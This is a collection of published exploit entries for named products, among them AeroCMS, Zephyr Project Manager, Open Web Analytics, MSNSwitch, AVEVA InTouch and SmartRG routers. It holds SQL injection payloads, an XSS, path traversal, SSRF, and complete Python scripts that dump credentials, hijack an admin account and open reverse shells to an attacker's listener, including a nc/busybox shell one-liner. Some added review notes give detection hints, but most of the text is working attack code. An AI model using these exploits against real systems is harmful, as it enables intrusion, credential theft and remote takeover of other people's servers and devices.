  16. # Title: Aero CMS v0.0.1 - SQLi # Author: nu11secur1ty # Date: 08.27.2022 # Vendor: https://github.com/MegaTKC # Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi # Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: author (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4 --- ```
  17. # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi # Date: 14-08-2022 # Exploit Author: Rizacan Tufan # Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated # Software Link: https://wordpress.org/plugins/zephyr-project-manager/ # Vendor Homepage: https://zephyr-one.com/ # Version: 3.2.42 # Tested on: Windows, Linux # CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) # Description Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively. It has been determined that data coming from input fields in most places throughout the application is used in the query without any sanitization or validation. The details of the discovery are given below. # Proof of Concept (PoC) The details of the various SQL injections in the application are given below. ## Endpoint of Get Project Data. Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... 
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_projects Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=zpm_view_project&project_id=1&zpm_nonce=22858bf3a7 Payload : --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=zpm_view_project&project_id=1 AND 4923=4923&zpm_nonce=22858bf3a7 Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: action=zpm_view_project&project_id=1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=22858bf3a7 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: action=zpm_view_project&project_id=-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=22858bf3a7 --- ## Endpoint of Get Task Data. Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_id=1&action=zpm_view_task&zpm_nonce=22858bf3a7 Payload : --- Parameter: task_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=zpm_view_task&zpm_nonce=22858bf3a7 --- ## Endpoint of New Task. 
Sample Request : POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 337 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_name=test&task_description=test&task_project=1&task_due_date=&task_start_date=&team=0&priority=priority_none&status=test&type=default&recurrence%5Btype%5D=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7 Payload : --- Parameter: task_project (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: task_name=test&task_description=test&task_project=1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=&task_start_date=&team=0&priority=priority_none&status=rrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=default&recurrence[type]=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7 ---
  18. # Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) # Date: 28/08/2022 # Exploit Author: Ashkan Moghaddas # Vendor Homepage: https://testa.cc # Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip # Version: 3.5.1 # Tested on: Windows/Linux # Proof of Concept: # 1- Install Testa 3.5.1 # 2- Go to https://localhost.com/login.php?redirect=XXXX # 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E # 4- XSS has been triggered. # Go to this url " https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E " XSS will trigger.
  19. # Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/" # Date: Thursday, September 1, 2022 # Exploit Author: ABDO10 # Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/ # Software Link: https://github.com/orangelabweb/imagemagick-engine/ # Version: <= 1.7.4 # Tested on: windows 10 -- vulnerable section https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529 -- payload on windows: d&calc.exe&anything -- on unix : notify-send "done" -- exploit : GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1 Host: localhost Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine X-Requested-With: XMLHttpRequest Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close
  20. # Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux
# CVE : CVE-2022-24637

# Review notes (defensive reading of the chain this script drives; each step
# is marked again at the code that performs it):
#  1. Unauthenticated GETs of serialized user-cache files at
#     owa-data/caches/<n>/owa_user/<md5("user_id<n>")>.php. The decoded cache
#     contains the user's temp_passkey.
#  2. That passkey is accepted by base.usersChangePassword, so the password is
#     reset and a normal login follows.
#  3. With the authenticated session, base.optionsUpdate points
#     base.error_log_file at a web-reachable path under owa-data/caches/.
#  4. A second optionsUpdate submits a PHP fragment as a config value, which
#     (per the script's own status messages) ends up in that log file; the
#     final GET to the .php runs it.
# Detection hints grounded in the requests below: HTTP 200 on unauthenticated
# GET owa-data/caches/*/owa_user/*.php; POSTs to owa_do=base.optionsGeneral
# changing base.error_log_file; new .php files appearing under owa-data/caches/.
# Remediation: upgrade past 1.7.3 (the header gives <1.7.4 as affected);
# presumably also deny direct web access to owa-data/caches/ — confirm against
# vendor guidance.

import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored


def print_message(message, type):
    """Print `message` with a coloured [LEVEL] prefix; unknown `type` prints nothing.

    `type` shadows the builtin; kept as-is (not renamed) to leave the script
    byte-identical.
    """
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') + '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') + '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') + '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') + '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') + '] ' + message)


def get_normalized_url(url):
    """Ensure a trailing slash and an http:// scheme when none is given."""
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url


def get_proxy_protocol(url):
    """Return 'https' for https:// URLs, otherwise 'http' (used as the proxies dict key)."""
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'


def get_random_string(length):
    """Alphanumeric string of `length` chars (random.choice is not cryptographically strong)."""
    chars = string.ascii_letters + string.digits
    return ''.join(random.choice(chars) for i in range(length))


def get_cache_content(cache_raw):
    """Extract the base64 blob between two '*' markers from a raw cache file and decode it.

    Calls exit() when the marker is missing, which the script treats as
    "target not vulnerable".
    """
    regex_cache_base64 = r'\*(\w*)\*'
    regex_result = re.search(regex_cache_base64, cache_raw)
    if not regex_result:
        print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
        exit()
    else:
        cache_base64 = regex_result.group(1)
        return base64.b64decode(cache_base64).decode("ascii")


def get_cache_username(cache):
    """Pull the user_id value out of the PHP-serialized owa_user cache.

    NOTE(review): the pattern hard-codes s:5:"..." so it only matches
    five-character usernames (e.g. "admin"); re.search(...).group(1) raises
    AttributeError on no match.
    """
    regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
    return re.search(regex_cache_username, cache).group(1)


def get_cache_temppass(cache):
    """Pull the 32-character temp_passkey out of the serialized cache (same no-match caveat as above)."""
    regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
    return re.search(regex_cache_temppass, cache).group(1)


def get_update_nonce(url):
    """Fetch `url` with the module-level `session`/`proxies` and scrape the owa_nonce form value.

    Depends on `session` and `proxies`, which are assigned at module level
    below; any failure prints an error and exits.
    """
    try:
        update_nonce_request = session.get(url, proxies=proxies)
        regex_update_nonce = r'owa_nonce" value="(\w*)"'
        update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
    except Exception as e:
        print_message('An error occurred when attempting to update config!', "ERROR")
        print(e)
        exit()
    else:
        return update_nonce


parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str, help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str, help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str, help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str, help='The username to exploit (Default: admin)')
parser.add_argument('-p','--password', default=get_random_string(32), type=str, help='The new password for the exploited user')
parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true', help='Check vulnerability without exploitation')
args = parser.parse_args()

# OWA endpoints used in the chain (all go through index.php?owa_do=...).
base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
username = args.username
new_password = args.password
# PHP fragment later submitted as a config value (step 4); the file it is
# written to sits under the web-exposed caches directory.
reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename

if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}

session = requests.Session()

try:
    mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
    # NOTE(review): message is missing its closing quote after base_url.
    print_message('Could not connect to "' + base_url, "ERROR")
    exit()
else:
    print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")

# Version fingerprint is a plain substring check on the landing page; both
# "not OWA" and "not 1.7.3" are warnings only and do not stop the script.
if 'Open Web Analytics' not in mainpage_request.text:
    print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
    print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
    print_message('The webserver indicates a vulnerable version!', "ALERT")

# A login attempt (with the username as password) is made only so the
# application populates the per-user cache file read in step 1.
try:
    data = { "owa_user_id": username, "owa_password": username, "owa_action": "base.login" }
    session.post(login_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred during the login attempt!', "ERROR")
    print(e)
    exit()
else:
    print_message('Attempting to generate cache for "' + username + '" user', "INFO")

# Step 1: probe cache directories 0..99 for owa_user/<md5("user_id<n>")>.php.
# Note these GETs use a fresh requests.get, i.e. unauthenticated.
print_message('Attempting to find cache of "' + username + '" user', "INFO")
found = False
for key in range(100):
    user_id = 'user_id' + str(key)
    userid_hash = hashlib.md5(user_id.encode()).hexdigest()
    filename = userid_hash + '.php'
    cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
    cache_request = requests.get(cache_url, proxies=proxies)
    if cache_request.status_code != 200:
        continue;
    cache_raw = cache_request.text
    cache = get_cache_content(cache_raw)
    cache_username = get_cache_username(cache)
    if cache_username != username:
        print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
        continue;
    else:
        found = True
        break

if not found:
    print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
    exit()

cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")

# --check stops here: the leaked passkey alone is taken as proof.
if args.check:
    print_message('The system appears to be vulnerable!', "ALERT")
    exit()

# Step 2: password reset using the leaked temp_passkey as owa_k, then login.
try:
    data = { "owa_password": new_password, "owa_password2": new_password, "owa_k": cache_temppass, "owa_action": "base.usersChangePassword" }
    session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when changing the user password!', "ERROR")
    print(e)
    exit()
else:
    print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")

try:
    data = { "owa_user_id": username, "owa_password": new_password, "owa_action": "base.login" }
    session.post(login_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred during the login attempt!', "ERROR")
    print(e)
    exit()
else:
    print_message('Logged in as "' + username + '" user', "SUCCESS")

# Step 3: redirect the error log into the web-exposed caches directory.
# The absolute path is hard-coded, so this assumes a default install prefix.
nonce = get_update_nonce(update_config_url)
try:
    log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
    data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[base.error_log_file]": log_location, "owa_config[base.error_log_level]": 2 }
    session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when attempting to update config!', "ERROR")
    print(e)
    exit()
else:
    print_message('Creating log file', "INFO")

# Step 4: submit the PHP fragment as a config value; per the status message
# below it is expected to be echoed into the new log file.
nonce = get_update_nonce(update_config_url)
try:
    data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[shell]": reverse_shell }
    session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when attempting to update config!', "ERROR")
    print(e)
    exit()
else:
    print_message('Wrote payload to log file', "INFO")

# Requesting the planted .php executes it.
try:
    session.get(shell_url, proxies=proxies)
except Exception as e:
    print(e)
else:
    print_message('Triggering payload! Check your listener!', "SUCCESS")
    print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")
  21. Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal Exploit Author: Jens Regel (CRISEC IT-Security) Date: 11/11/2022 CVE: CVE-2022-23854 Version: Access Anywhere Secure Gateway versions 2020 R2 and older Proof of Concept: GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1 HTTP/1.1 200 OK Server: EricomSecureGateway/8.4.0.26844.* (..) ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
  22. Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) Google Dork: n/a Date:9/1/2022 Exploit Author: Eli Fulkerson Vendor Homepage: https://www.msnswitch.com/ Version: MNT.2408 Tested on: MNT.2408 firmware CVE: CVE-2022-32429
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access. Full RCE requires you to be on the same subnet as the device.
"""
# Review notes (defensive reading):
#  - Issue 1: GET /cgi-bin-hax/ExportSettings.sh is served without any
#    authentication and returns key=value settings including Account1 and
#    Password1 (the script parses exactly those two keys).
#  - Issue 2: after a cookie login via /goform/login, the firmware_url
#    parameter of /cgi-bin/upgrade.cgi is built with URL-encoded backticks
#    (%60) and a pipe (%7C), i.e. the value reaches a shell unescaped.
#  - Detection: any request to /cgi-bin-hax/ExportSettings.sh; requests to
#    /cgi-bin/upgrade.cgi whose firmware_url contains %60, %7C or other
#    shell metacharacters; a csrftoken present is not sufficient to block it.
#  - Mitigation: vendor firmware update and restricting the management
#    interface to a trusted network segment — confirm against vendor advisory.
import requests
import sys
import urllib.parse
import readline
import random
import string

# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80

# Left as None so the credential dump below is used; set both to skip it.
USERNAME = None
PASSWORD = None

"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
    # lets just ask
    hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
    session = requests.session()
    data = session.get(hack_url)
    # Settings come back one key=value per line; lines without '=' are skipped
    # by the bare except (a value containing '=' is truncated at the first one).
    for each in data.text.split('\n'):
        key = None
        val = None
        try:
            key = each.strip().split('=')[0]
            val = each.strip().split('=')[1]
        except:
            pass
        if key == "Account1":
            USERNAME = val
        if key == "Password1":
            PASSWORD = val

"""
Second vulnerability, authenticated command execution
This only works on the local lan.

for full reverse shell, modify and upload netcat busybox shell script to /tmp:
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""
session = requests.session()

# initial login, establishes our Cookie
# (headers are a verbatim Burp export; note the hard-coded Referer host,
# which differs from TARGET and is not required by anything visible here)
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)

# get our csrftoken
# Scraped from the upgrade page; the token is attached to every upgrade.cgi
# request below, so CSRF protection does not prevent the injection.
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]

# Interactive loop: each command is URL-encoded into firmware_url. The very
# short timeout is deliberate — the request is fire-and-forget and the
# ReadTimeout is swallowed.
while True:
    CMD = input('x:')
    CMD_u = urllib.parse.quote_plus(CMD)
    # NOTE(review): `filename` is computed but not referenced in the visible
    # code; the "(unknown)" path segment in the URL below may be a rendering
    # artifact of this listing — confirm against the original.
    filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
    try:
        hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F(unknown)%3F&csrftoken={csrftoken}"
        session.get(hack_url, timeout=0.01)
    except requests.exceptions.ReadTimeout:
        pass
  23. # Exploit Title: IOTransfer V4 - Unquoted Service Path # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Discovery Date: 2022-28-07 # Vendor Homepage: http://www.iobit.com/en/index.php # Software Link: https://iotransfer.itopvpn.com/download/ # Tested Version: V4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe Auto C:\>sc qc IOTUpdaterSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IOTUpdaterSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IOTransfer Updater DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows Server 2019 Standard Evaluation OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation
  24. #Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery) #Exploit Author: Emir Polat #Vendor Homepage: https://github.com/opencv/cvat #Version: < 2.0.0 #Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) #CVE: CVE-2022-31188 # Description: #CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. POST /api/v1/tasks/2/data HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: application/json, text/plain, */* Accept-Language:en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Token 06d88f739a10c7533991d8010761df721b790b7 X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436 Content-Length: 569 Origin: http://localhost:8080 Connection: close Referer:http://localhost:8080/tasks/create Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="remote files[0]" http://localhost:8081 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name=" image quality" 170 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use zip chunks" true -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use cache" true -----------------------------251652214142138553464236533436--
  25. # Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

# NOTE(review): this listing carries quoted-printable transport artifacts
# from the mailing-list export (`=3D` tokens and a soft line break `= ` inside
# the first Popen string); it is reproduced as published and is not valid
# Python as shown.
#
# Review notes (defensive reading):
#  - Authentication is a hard-coded HTTP Basic credential (base64 in
#    `authorization_header`) sent to /admin/ping.html and /admin/pingHost.cmd.
#  - The injection point is the `targetHostAddress` parameter of
#    /admin/pingHost.cmd: the value sent starts with `|`, so the parameter is
#    evidently passed to a shell unescaped.
#  - Detection: requests to /admin/pingHost.cmd whose targetHostAddress
#    contains `|`, backticks or other shell metacharacters; Basic-auth
#    requests to /admin/ping.html from unexpected hosts.
#  - Mitigation: vendor firmware update; keep the admin interface off
#    untrusted networks and change default credentials — confirm against the
#    vendor advisory.

import requests
from subprocess import Popen, PIPE

router_host =3D "http://192.168.1.1"
authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"
lhost =3D "lo"
lport =3D 80
payload_port =3D 81

def main():
    """Start a local nc listener that serves a second-stage command, then fire the injection.

    The `echo` process output is fed to `nc -nlvp <payload_port>`, so the
    router's `nc {lhost} {payload_port}|sh` call receives and runs it.
    """
    e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm= p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")

def get_session():
    """Fetch /admin/ping.html with Basic auth and scrape the sessionKey value.

    Reads characters after "&sessionKey=" up to the next single quote.
    Raises IndexError if the marker is absent (find() returns -1).
    """
    url =3D router_host + "/admin/ping.html"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    r =3D requests.get(url, headers=3Dheaders).text
    i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
    s =3D ""
    while r[i] !=3D "'":
        s =3D s + r[i]
        i =3D i + 1
    return s

def send_payload(payload):
    """Submit `payload` as targetHostAddress to /admin/pingHost.cmd (the injection point).

    A fresh sessionKey is scraped for each call; the response body is
    fetched but discarded.
    """
    print(payload)
    url =3D router_host + "/admin/pingHost.cmd"
    headers =3D {"Authorization": "Basic {}".format(authorization_header)}
    params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"= : get_session()}
    requests.get(url, headers=3Dheaders, params=3Dparams).text

main()